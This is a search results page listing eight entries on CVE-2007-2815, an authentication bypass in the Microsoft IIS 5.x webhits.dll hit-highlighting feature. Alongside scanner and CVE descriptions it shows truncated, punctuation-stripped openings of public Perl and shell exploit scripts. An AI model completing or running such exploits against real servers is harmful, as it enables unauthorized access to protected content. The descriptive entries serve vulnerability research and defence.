8 matches found
Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass
The remote IIS web server contains a vulnerability in the Server Hit Hilight Module which may allow an attacker to view the contents of a page otherwise requiring authentication. An attacker may exploit this flaw to bypass authentication on certain pages. C Tenable Network Security, Inc...
CVE-2007-2815.txt
CVE-2007-2815 ff0000 [email protected] 01/06/2007 ! /usr/bin/perl use LWP 5.64; require "getopt.pl"; &Getopt'shop'; $browser = LWP::UserAgent-new; $proto=$opts;if$opts$proto="https";else$proto="http"; $host=$opth;if!$opth&usage; $obj =$opto;if!$opto&usage; $port=$optp;if!$optp$port=80; $url =...
Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
No description provided by source. NTLM BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: http://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 Site Protected Object\nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass !/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
Exploit for unknown platform in category remote exploits =================================================================== Microsoft IIS \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n"; exit 0 fi site=$1 protectedObject=$2...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
!/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n"; exit 0 fi site=$1 protectedObject=$2...
CVE-2007-2815
CVE-2007-2815 concerns Microsoft IIS webhits.dll Hit-Highlighting authentication bypass. The hit-highlighting feature in IIS Web Server 5.x (notably IIS 5.0/5.1) uses Windows NT ACLs, enabling remote attackers to bypass NTLM and Basic authentication and access private web directories via the CiWe...
CVE-2007-2815
The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services IIS Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile...